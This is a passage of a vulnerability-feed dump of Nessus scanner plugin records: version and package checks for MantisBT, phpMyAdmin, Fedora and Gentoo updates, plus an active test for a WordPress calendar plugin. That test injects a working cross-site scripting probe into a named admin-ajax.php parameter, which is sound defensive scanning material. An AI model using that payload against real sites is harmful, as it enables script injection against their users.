(CVE-2014-1609)\n\nNote that Nessus has relied only on the self-reported version number\nand has not actually tried to exploit these issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mantisbt.org/blog/archives/mantisbt/275\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mantisbt.org/bugs/view.php?id=16513\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mantisbt.org/bugs/view.php?id=16879\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mantisbt.org/bugs/view.php?id=16880\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 1.2.16 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/10/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/27\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mantisbt:mantisbt\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"mantis_detect.nasl\");\n script_require_keys(\"installed_sw/MantisBT\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\napp_name = \"MantisBT\";\n\ninstall = get_single_install(app_name: app_name, port: port, exit_if_unknown_ver:TRUE);\ninstall_url = build_url(port:port, qs:install['path']);\nversion = install['version'];\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nver = split(version, sep:\".\", keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n# Versions 1.1.0 < 1.2.16 are vulnerable\nif (\n (ver[0] == 1 && ver[1] == 1) ||\n (ver[0] == 1 && ver[1] == 2 && ver[2] < 16)\n)\n{\n set_kb_item(name:'www/'+port+'/SQLInjection', value:TRUE);\n set_kb_item(name:'www/'+port+'/XSS', value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' +install_url+\n '\\n Installed version : ' +version+\n '\\n Fixed version : 1.2.16\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app_name, install_url, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:50:54", "description": "new upstream release, fixing security issues :\n\n - CVE-2014-1608\n\n - CVE-2014-1609\n\n - CVE-2014-2238\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-03-13T00:00:00", "type": "nessus", "title": "Fedora 20 : mantis-1.2.17-1.fc20 (2014-3421)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1608", "CVE-2014-1609", "CVE-2014-2238"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:mantis", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-3421.NASL", "href": "https://www.tenable.com/plugins/nessus/72970", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-3421.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72970);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-1608\", \"CVE-2014-1609\", \"CVE-2014-2238\");\n script_bugtraq_id(65445, 65461, 65903);\n script_xref(name:\"FEDORA\", value:\"2014-3421\");\n\n script_name(english:\"Fedora 20 : mantis-1.2.17-1.fc20 (2014-3421)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"new upstream release, fixing security issues :\n\n - CVE-2014-1608\n\n - CVE-2014-1609\n\n - CVE-2014-2238\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1063111\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1071459\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-March/130035.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f2dbf7df\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mantis package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mantis\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"mantis-1.2.17-1.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mantis\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:50:54", "description": "new upstream release, fixing security issues :\n\n - CVE-2014-1608\n\n - CVE-2014-1609\n\n - CVE-2014-2238\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-03-13T00:00:00", "type": "nessus", "title": "Fedora 19 : mantis-1.2.17-1.fc19 (2014-3440)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1608", "CVE-2014-1609", "CVE-2014-2238"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:mantis", "cpe:/o:fedoraproject:fedora:19"], "id": "FEDORA_2014-3440.NASL", "href": "https://www.tenable.com/plugins/nessus/72973", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-3440.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72973);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-1608\", \"CVE-2014-1609\", \"CVE-2014-2238\");\n script_bugtraq_id(65445, 65461, 65903);\n script_xref(name:\"FEDORA\", value:\"2014-3440\");\n\n script_name(english:\"Fedora 19 : mantis-1.2.17-1.fc19 (2014-3440)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"new upstream release, fixing security issues :\n\n - CVE-2014-1608\n\n - CVE-2014-1609\n\n - CVE-2014-2238\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1063111\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1071459\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-March/130019.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b5756c84\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mantis package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mantis\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"mantis-1.2.17-1.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mantis\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:46:48", "description": "The remote web server is hosting MantisBT, an open source bug tracking application written in PHP.\n\nVersions of MantisBT 1.1.0 prior to 1.2.16 are potentially affected by multiple vulnerabilities :\n\n - A cross-site scripting vulnerability exists because the application does not validate the 'project_id' parameter upon submission to the 'account_sponsor_page.php' script. 
This may allow a malicious user with 'project manager' access to execute arbitrary script code within the browser / server trust relationship with a specially crafted request. (CVE-2013-4460)\n\n - A SQL injection vulnerability exists due to the 'db_query()' function not properly sanitizing user-supplied input passed via a 'mc_issue_attachment_get' SOAP request. This may allow an authenticated remote attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data. This issue affects version 1.1.0a4 or later. (CVE-2014-1608)\n\n - Multiple SQL injection flaws exist in 'core/news_api.php', 'core/summary_api.php', 'plugins/MantisGraph/core/graph_api.php', 'api/soap/mc_project_api.php', and 'proj_doc_page.php' pages. This could allow a remote attacker to inject or manipulate SQL queries, allowing for the manipulation or disclosure of arbitrary data. This issue only affects versions 1.2.0 - 1.2.15. (CVE-2014-1609)", "cvss3": {"score": 7.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "published": "2015-02-18T00:00:00", "type": "nessus", "title": "MantisBT 1.1.0 < 1.2.16 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1608", "CVE-2014-1609", "CVE-2013-4460"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:mantisbt:mantisbt:*:*:*:*:*:*:*:*"], "id": "8900.PRM", "href": "https://www.tenable.com/plugins/nnm/8900", "sourceData": "Binary data 8900.prm", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:45:55", "description": "The remote host is affected by the vulnerability described in GLSA-201505-03 (phpMyAdmin: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in phpMyAdmin. 
Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote authenticated attacker could exploit these vulnerabilities to include and execute arbitrary local files via a crafted parameter, inject SQL code, or to conduct Cross-Site Scripting attacks.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": null, "vector": null}, "published": "2015-06-01T00:00:00", "type": "nessus", "title": "GLSA-201505-03 : phpMyAdmin: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4986", "CVE-2014-4987", "CVE-2014-6300", "CVE-2014-8958", "CVE-2014-8959", "CVE-2014-8960", "CVE-2014-8961"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:phpmyadmin", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201505-03.NASL", "href": "https://www.tenable.com/plugins/nessus/83912", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201505-03.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83912);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-4986\", \"CVE-2014-4987\", \"CVE-2014-6300\", \"CVE-2014-8958\", \"CVE-2014-8959\", \"CVE-2014-8960\", \"CVE-2014-8961\");\n script_bugtraq_id(68803, 68804, 69790, 71243, 71244, 71245, 71247);\n script_xref(name:\"GLSA\", value:\"201505-03\");\n\n script_name(english:\"GLSA-201505-03 : phpMyAdmin: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201505-03\n(phpMyAdmin: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in phpMyAdmin. 
Please\n review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote authenticated attacker could exploit these vulnerabilities to\n include and execute arbitrary local files via a crafted parameter, inject\n SQL code, or to conduct Cross-Site Scripting attacks.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201505-03\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All phpMyAdmin 4.2 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-db/phpmyadmin-4.2.13'\n All phpMyAdmin 4.1 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-db/phpmyadmin-4.1.14.7'\n All phpMyAdmin 4.0 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-db/phpmyadmin-4.0.10.6'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:phpmyadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-db/phpmyadmin\", unaffected:make_list(\"ge 4.2.13\", \"rge 4.1.14.7\", \"rge 4.0.10.6\", \"rge 4.0.10.15\", \"rge 4.0.10.16\", \"rge 4.0.10.17\", \"rge 4.0.10.18\"), vulnerable:make_list(\"lt 4.2.13\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:47:57", "description": "The version of the Google Calendar Events plugin for WordPress installed on the remote host fails to properly sanitize user-supplied input to the 'gce_feeds_ids' parameter of the 'admin-ajax.php' script before returning it to users. 
An attacker can use this to execute arbitrary script code within the context of the user's browser.", "cvss3": {"score": null, "vector": null}, "published": "2014-11-21T00:00:00", "type": "nessus", "title": "Google Calendar Events Plugin for WordPress 'admin-ajax.php' XSS", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7138"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/a:wordpress:wordpress"], "id": "WORDPRESS_GOOGLE_CALENDAR_EVENTS_XSS.NASL", "href": "https://www.tenable.com/plugins/nessus/79385", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79385);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-7138\");\n script_bugtraq_id(70370);\n\n script_name(english:\"Google Calendar Events Plugin for WordPress 'admin-ajax.php' XSS\");\n script_summary(english:\"Attempts to inject script code.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a PHP script that is affected by a cross-\nsite scripting vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of the Google Calendar Events plugin for WordPress\ninstalled on the remote host fails to properly sanitize user-supplied\ninput to the 'gce_feeds_ids' parameter of the 'admin-ajax.php' script\nbefore returning it to users. 
An attacker can use this to execute\narbitrary script code within the context of the user's browser.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://philderksen.com/google-calendar-events-version-2/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wordpress.org/plugins/google-calendar-events/#changelog\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 2.0.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"wordpress_detect.nasl\");\n script_require_keys(\"installed_sw/WordPress\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"url_func.inc\");\n\napp = \"WordPress\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(app_name:app, port:port);\n\ndir = install['path'];\ninstall_url = build_url(port:port, qs:dir);\n\nplugin = \"Google Calendar Events\";\n\n# Check KB first\ninstalled = get_kb_item(\"www/\"+port+\"/webapp_ext/\"+plugin+\" under \"+dir);\n\nif (!installed)\n{\n checks = make_array();\n path = \"/wp-content/plugins/\";\n checks[path + \"google-calendar-events/css/admin.css\"][0] =\n make_list('@package +GCE');\n\n # Ensure plugin is installed\n installed = check_webapp_ext(\n checks : checks,\n dir : dir,\n port : port,\n ext : plugin\n );\n}\nif (!installed) audit(AUDIT_WEB_APP_EXT_NOT_INST, app, install_url, plugin + \" plugin\");\n\nxss_test = \"'\" + '\"><script>alert(' + unixtime() + ')</script>';\n\nexploit = test_cgi_xss(\n port : port,\n dirs : make_list(dir),\n cgi : '/wp-admin/admin-ajax.php',\n qs : 'action=gce_ajax&gce_type=page&gce_feed_ids=' + urlencode(str:xss_test),\n pass_re : \"gce-month-title\",\n pass_str : \"<script>alert(\"\n);\n\nif (!exploit) audit(AUDIT_WEB_APP_EXT_NOT_AFFECTED, app, install_url, plugin + \" plugin\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-04-16T14:09:49", "description": "According to its self-reported version number, the phpMyAdmin application hosted on the remote web server is 4.0.x prior to 4.0.10.3, 4.1.x prior to 4.1.14.4, or 4.2.x prior to 4.2.8.1. 
It is, therefore, affected by an input-validation error related to the 'micro history' feature that could allow a DOM-based cross-site scripting attack that could further lead to cross-site request forgery attacks.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-16T00:00:00", "type": "nessus", "title": "phpMyAdmin 4.0.x < 4.0.10.3 / 4.1.x < 4.1.14.4 / 4.2.x < 4.2.8.1 Micro History XSS and XSRF Vulnerabilities (PMASA-2014-10)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6300"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:phpmyadmin:phpmyadmin"], "id": "PHPMYADMIN_PMASA_2014_10.NASL", "href": "https://www.tenable.com/plugins/nessus/77702", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77702);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-6300\");\n script_bugtraq_id(69790);\n\n script_name(english:\"phpMyAdmin 4.0.x < 4.0.10.3 / 4.1.x < 4.1.14.4 / 4.2.x < 4.2.8.1 Micro History XSS and XSRF Vulnerabilities (PMASA-2014-10)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a PHP application that is affected by\ncross-site scripting and cross-site request forgery vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the phpMyAdmin\napplication hosted on the remote web server is 4.0.x prior to\n4.0.10.3, 4.1.x prior to 4.1.14.4, or 4.2.x prior to 4.2.8.1. 
It is,\ntherefore, affected by an input-validation error related to the 'micro\nhistory' feature that could allow a DOM-based cross-site scripting\nattack that could further lead to cross-site request forgery attacks.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-10.php\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/33b39f9f1dd9a4d27856530e5ac004e23b30e8ac\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8ef26e90\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to phpMyAdmin 4.0.10.3 / 4.1.14.4 / 4.2.8.1 or later, or apply\nthe patches from the referenced links.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-6300\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/16\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n 